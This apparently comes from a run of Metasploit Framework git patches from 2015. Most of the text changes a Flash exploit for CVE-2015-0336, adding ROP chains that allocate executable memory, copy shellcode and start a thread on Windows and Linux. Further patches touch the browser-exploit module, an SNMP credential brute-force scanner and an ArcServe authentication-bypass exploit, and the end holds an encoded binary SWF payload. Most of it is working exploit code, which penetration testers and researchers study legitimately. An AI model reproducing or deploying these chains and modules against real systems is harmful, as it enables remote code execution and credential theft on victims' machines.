+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
             } else ba.writeUnsignedInt(value)
         }
     }
diff --git a/external/source/exploits/CVE-2015-0336/Exploiter.as b/external/source/exploits/CVE-2015-0336/Exploiter.as
index 036ffceb04..a56ca190ee 100644
--- a/external/source/exploits/CVE-2015-0336/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0336/Exploiter.as
@@ -9,7 +9,7 @@ package
         private var exploit:Exploit
         private var ev:ExploitVector
         private var eba:ExploitByteArray
-        private var payload:String
+        private var payload:ByteArray
         private var platform:String
         private var pos:uint
         private var byte_array_object:uint
@@ -25,7 +25,7 @@ package
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(89698)
 
-        public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
+        public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.<uint>):void
         {
             exploit = exp
             payload = p
@@ -147,11 +147,16 @@ package
             var pe:PE = new PE(eba)
             var flash:uint = pe.base(vtable)
             var winmm:uint = pe.module("winmm.dll", flash)
-            var kernel32:uint = pe.module("kernel32.dll", winmm)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
             var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
             var winexec:uint = pe.procedure("WinExec", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
             var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
             var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
             // Continuation of execution
             eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
@@ -169,17 +174,35 @@ package
             eba.write(0, virtualprotect)
 
             // VirtualProtect
-            eba.write(0, winexec)
+            eba.write(0, virtualalloc)
             eba.write(0, buffer + 0x10)
             eba.write(0, 0x1000)
             eba.write(0, 0x40)
             eba.write(0, buffer + 0x8) // Writable address (4 bytes)
 
-            // WinExec
-            eba.write(0, buffer + 0x10)
-            eba.write(0, payload_address + 8)
-            eba.write(0)
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x70000000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
 
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x70000000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
             eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
             exploit.toString() // call method in the fake vtable
         }
@@ -192,6 +215,8 @@ package
             var libc:Elf = new Elf(eba, feof)
             var popen:uint = libc.symbol("popen")
             var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
             var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
             var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
             var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
@@ -204,9 +229,23 @@ package
             // 2) Recover original stack
             eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
 
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+        
+//            eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
+
             // Put the popen parameters in memory
-            eba.write(payload_address + 8, 'r', true) // type
-            eba.write(payload_address + 0xc, payload, true) // command
+            eba.write(payload_address + 0x8, payload, true) // false
            
             // Put the fake stack/vtable on memory 
             eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
@@ -221,13 +260,49 @@ package
             eba.write(0, buffer) // addr
             eba.write(0, 0x1000) // size
             eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
-            // Return to popen()
-            eba.write(stack_address + 0x18068, popen)
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
             // Return to CoE (fix stack and object vtable)
             eba.write(0, buffer + 0x10)
-            // popen() argument
-            eba.write(0, payload_address + 0xc)
-            eba.write(0, payload_address + 8) 
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
            
             //call   DWORD PTR [eax+0x24]
             //EAX: 0x41414141 ('AAAA')
diff --git a/external/source/exploits/CVE-2015-0336/PE.as b/external/source/exploits/CVE-2015-0336/PE.as
index a80ade9321..8753586477 100644
--- a/external/source/exploits/CVE-2015-0336/PE.as
+++ b/external/source/exploits/CVE-2015-0336/PE.as
@@ -11,7 +11,6 @@ package
 
         public function base(addr:uint):uint
         {
-            Logger.log("[*] PE - base(): searching base for 0x" + addr.toString(16))
             addr &= 0xffff0000
             while (true) {
                 if (eba.read(addr) == 0x00905a4d) return addr
@@ -54,10 +53,20 @@ package
         public function gadget(gadget:String, hint:uint, addr:uint):uint
         {
             var find:uint = 0
+            var contents:uint = 0
             var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
             var value:uint = parseInt(gadget, 16)
-            for (var i:uint = 0; i < limit - 4; i++) if (value == (eba.read(addr + i) & hint)) break
-            return addr + i
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
         }
     }
 }
diff --git a/external/source/exploits/CVE-2015-0336/Trigger/src/Main.as b/external/source/exploits/CVE-2015-0336/Trigger/src/Main.as
index 7daf1e8da9..27e00868e7 100755
--- a/external/source/exploits/CVE-2015-0336/Trigger/src/Main.as
+++ b/external/source/exploits/CVE-2015-0336/Trigger/src/Main.as
@@ -4,7 +4,7 @@ class Main
 {
 	public static function main(swfRoot:MovieClip):Void 
 	{
-		var _loc2_ = _global.ASnative(2100, 0x1a1e2000);
+		var _loc2_ = _global.ASnative(2100, 0x14950000);
 		var _loc3_ = new Object();
 		_loc2_.__proto__ = _loc3_; 
 		_global.ASnative(2100, 200)(_loc3_); //Netconnection constructor
diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index 8412136cf0..67bcc9fdc4 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -44,8 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           'DisableNops' => true
         },
-      'Platform'            => ['win', 'unix'],
-      'Arch'                => [ARCH_X86, ARCH_CMD],
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
@@ -57,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
           :ua_name => lambda do |ua|
             case target.name
             when 'Windows'
-              return true if ua == Msf::HttpClients::IE
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
             when 'Linux'
               return true if ua == Msf::HttpClients::FF
             end
@@ -79,14 +78,12 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Windows',
             {
-              'Platform' => 'win',
-              'Arch'     => ARCH_X86
+              'Platform' => 'win'
             }
           ],
           [ 'Linux',
             {
-              'Platform' => 'unix',
-              'Arch'     => ARCH_CMD
+              'Platform' => 'linux'
             }
           ]
         ],
@@ -117,15 +114,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
 
     if target.name =~ /Windows/
-      target_payload = get_payload(cli, target_info)
-      psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-      b64_payload = Rex::Text.encode_base64(psh_payload)
       platform_id = 'win'
     elsif target.name =~ /Linux/
-      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
-      b64_payload = Rex::Text.encode_base64(target_payload)
       platform_id = 'linux'
     end
 

From d3c374147852d2b8301bcb0c531622c9844d00f6 Mon Sep 17 00:00:00 2001
From: John Sherwood <john@patchadvisor.com>
Date: Wed, 3 Jun 2015 18:08:38 -0400
Subject: [PATCH 0305/1013] Use run_host so that we can use THREADS

- The refactor left the module using run_batch even though the
  features of the code that made this desirable were removed (i.e.,
  it was no longer doing one batch per community string).  By now
  switching back to run_host, we can again take advantage of the
  built-in metasploit multithreading capabilities.

- Also, added back in the display of the result.proof field.  This
  aids in identifying false positives (which have a blank response)
  and is functionality worth keeping.
---
 modules/auxiliary/scanner/snmp/snmp_login.rb | 71 +++++++++-----------
 1 file changed, 31 insertions(+), 40 deletions(-)

diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb
index be6480fd88..ec3cd19571 100644
--- a/modules/auxiliary/scanner/snmp/snmp_login.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_login.rb
@@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary
       Opt::CHOST,
       OptInt.new('CONNECTION_TIMEOUT', [true, 'The timeout value for each probe', 2]),
       OptInt.new('RETRIES', [true, 'The number of retries per community string', 0]),
-      OptInt.new('BATCHSIZE', [true, 'The number of hosts to probe in each set', 256]),
       OptEnum.new('VERSION', [true, 'The SNMP version to scan', 'all', ['1', '2c', 'all']]),
       OptString.new('PASSWORD', [ false, 'The password to test' ]),
       OptPath.new('PASS_FILE',  [ false, "File containing communities, one per line",
@@ -43,50 +42,42 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE')
   end
 
+  # Operate on a single host so that we can take advantage of multithreading
+  def run_host(ip)
 
-  # Define our batch size
-  def run_batch_size
-    datastore['BATCHSIZE'].to_i
-  end
+    collection = Metasploit::Framework::CommunityStringCollection.new(
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD']
+    )
 
-  # Operate on an entire batch of hosts at once
-  def run_batch(batch)
+    scanner = Metasploit::Framework::LoginScanner::SNMP.new(
+        host: ip,
+        port: rport,
+        cred_details: collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+        connection_timeout: datastore['CONNECTION_TIMEOUT'],
+        retries: datastore['RETRIES'],
+        version: datastore['VERSION'],
+        framework: framework,
+        framework_module: self
+    )
 
-    batch.each do |ip|
-      collection = Metasploit::Framework::CommunityStringCollection.new(
-          pass_file: datastore['PASS_FILE'],
-          password: datastore['PASSWORD']
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+          module_fullname: self.fullname,
+          workspace_id: myworkspace_id
       )
+      if result.success?
+        credential_core = create_credential(credential_data)
+        credential_data[:core] = credential_core
+        create_credential_login(credential_data)
 
-      scanner = Metasploit::Framework::LoginScanner::SNMP.new(
-          host: ip,
-          port: rport,
-          cred_details: collection,
-          stop_on_success: datastore['STOP_ON_SUCCESS'],
-          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
-          connection_timeout: datastore['CONNECTION_TIMEOUT'],
-          retries: datastore['RETRIES'],
-          version: datastore['VERSION'],
-          framework: framework,
-          framework_module: self
-      )
-
-      scanner.scan! do |result|
-        credential_data = result.to_h
-        credential_data.merge!(
-            module_fullname: self.fullname,
-            workspace_id: myworkspace_id
-        )
-        if result.success?
-          credential_core = create_credential(credential_data)
-          credential_data[:core] = credential_core
-          create_credential_login(credential_data)
-
-          print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential} (Access level: #{result.access_level})"
-        else
-          invalidate_login(credential_data)
-          print_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})"
-        end
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential} (Access level: #{result.access_level}); Proof (sysDescr.0): #{result.proof}"
+      else
+        invalidate_login(credential_data)
+        print_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})"
       end
     end
   end

From a0aa6135c5b0bf418617ba100a57cddb562af267 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 3 Jun 2015 20:02:07 -0500
Subject: [PATCH 0306/1013] Update ca_arcserve_rpc_authbypass to use the new
 cred API

---
 .../http/ca_arcserve_rpc_authbypass.rb        | 44 ++++++++++++++-----
 1 file changed, 34 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
index 252c2bb0f8..7590171b5b 100644
--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -58,6 +58,33 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class )
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def exploit
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
 
@@ -105,16 +132,13 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # report the auth
-    auth = {
-        :host   => datastore['RHOST'],
-        :port   => 445,
-        :sname  => 'smb',
-        :proto  => 'tcp',
-        :user   => user,
-        :pass   => pass,
-        :active => true
-      }
-    report_auth_info(auth)
+    report_cred(
+      ip: datastore['RHOST'],
+      port: 445,
+      service_name: 'smb',
+      user: user,
+      password: pass
+    )
 
     srvc = {
         :host   => datastore['RHOST'],

From 78e4677bb1b37cf00bbfaba1a8583fba71724ad6 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 3 Jun 2015 20:10:01 -0500
Subject: [PATCH 0307/1013] Oops it blew up

---
 modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
index 7590171b5b..b2a8238115 100644
--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -70,9 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote
     credential_data = {
       module_fullname: fullname,
       post_reference_name: self.refname,
-      session_id: session_db_id,
-      origin_type: :session,
       private_data: opts[:password],
+      origin_type: :service,
       private_type: :password,
       username: opts[:user]
     }.merge(service_data)

From 80cb70cacf4f7bad1e85d14b01c1bc52f6feb4ae Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 3 Jun 2015 22:46:04 -0500
Subject: [PATCH 0308/1013] Add support for Windows 8.1/Firefox

---
 data/exploits/CVE-2015-0336/msf.swf           | Bin 20776 -> 20968 bytes
 .../source/exploits/CVE-2015-0336/Exploit.as  |   5 +-
 .../exploits/CVE-2015-0336/Exploiter.as       |  95 ++++++++++++++++--
 .../adobe_flash_net_connection_confusion.rb   |   8 +-
 4 files changed, 93 insertions(+), 15 deletions(-)

diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf
index f8492e42e8860d9a9da45cb2b6712a3a493fb098..8a05ef2a538096d61ce6f030a685705e0613e85d 100644
GIT binary patch
delta 20849
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
